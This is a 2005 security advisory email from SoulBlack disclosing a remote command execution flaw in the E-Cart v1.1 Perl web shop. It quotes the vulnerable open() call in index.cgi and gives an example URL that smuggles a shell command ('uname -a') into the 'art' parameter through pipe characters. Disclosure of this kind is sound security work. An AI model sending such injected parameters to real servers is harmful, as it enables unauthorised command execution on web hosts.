------=_Part_734_24926651.1114105332381
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Title: E-Cart v1.1 Remote Command Execution
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 20/04/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: <=3D E-Cart 2004 v1.1
Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
*Summary
E-Cart is a mod of WepApp written in Perl. It is WebShop.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
*Problem Description:

The bug is in the file index.cgi where the variable art that is put under=
=20
"open()", does
not have a control of data, allowing to the attacker to execute any type of=
=20
commands.

Vulnerable code
---------------
sub viewart {
&cartfooter;
open(DATA, "$catdir/$info{'cat'}/$info{'art'}"); hold(DATA); chomp(@data =
=3D=20
<DATA>); release(DATA); close(DATA);
...
...
...

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

*Example:

http://SITE/DIRTOECART/index.cgi?action=3Dviewart&cat=3Dreproductores_dvd&a=
rt=3Dreproductordvp-ns315.dat|uname%20-a|

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
*Fix:

Contact the Vendor.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
--
SoulBlack - Security Research
http://www.soulblack.com.ar



--=20
I=F1aki Cormenzana=20
SoulBlack`s Staff
Y3VhbmRvIHRlbmVtb3MgZWwgbWljcvNmb25vLCB0ZW5lbW9zIHNvdWwuLi4=3D

------=_Part_734_24926651.1114105332381
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
Title: E-Cart v1.1 Remote Command Execution<br>
Vulnerability discovery: SoulBlack - Security Research -<br>
<a href=3D"http://soulblack.com.ar">http://soulblack.com.ar</a><br>
Date: 20/04/2005<br>
Severity: High. Remote Users Can Execute Arbitrary Code.<br>
Affected version: &lt;=3D E-Cart 2004 v1.1<br>
Vendor: <a href=3D"http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.c=
gi">http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi</a><br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
*Summary<br>
E-Cart is a mod of WepApp written in Perl. It is WebShop.<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
*Problem Description:<br>
<br>
The bug is in the file index.cgi where the variable art that is put under &=
quot;open()&quot;, does<br>
not have a control of data, allowing to the attacker to execute any type of=
 commands.<br>
<br>
Vulnerable code<br>
---------------<br>
sub viewart {<br>
&nbsp;&nbsp;&nbsp; &amp;cartfooter;<br>
&nbsp;&nbsp;&nbsp; open(DATA, &quot;$catdir/$info{'cat'}/$info{'art'}&quot;=
);
hold(DATA); chomp(@data =3D &lt;DATA&gt;); release(DATA); close(DATA);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ...<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ...<br>
&nbsp;&nbsp; &nbsp; &nbsp;&nbsp; ...<br>
<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
<br>
*Example:<br>
<br>
<a href=3D"http://SITE/DIRTOECART/index.cgi?action=3Dviewart&amp;cat=3Drepr=
oductores_dvd&amp;art=3Dreproductordvp-ns315.dat|uname%20-a|">http://SITE/D=
IRTOECART/index.cgi?action=3Dviewart&amp;cat=3Dreproductores_dvd&amp;art=3D=
reproductordvp-ns315.dat|uname%20-a|
</a><br>
<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
*Fix:<br>
<br>
Contact the Vendor.<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
--<br>
SoulBlack - Security Research<br>
<a href=3D"http://www.soulblack.com.ar">http://www.soulblack.com.ar</a><br>
<br>
<br>
<br>-- <br>I=F1aki Cormenzana <br>SoulBlack`s Staff<br>Y3VhbmRvIHRlbmVtb3Mg=
ZWwgbWljcvNmb25vLCB0ZW5lbW9zIHNvdWwuLi4=3D

------=_Part_734_24926651.1114105332381--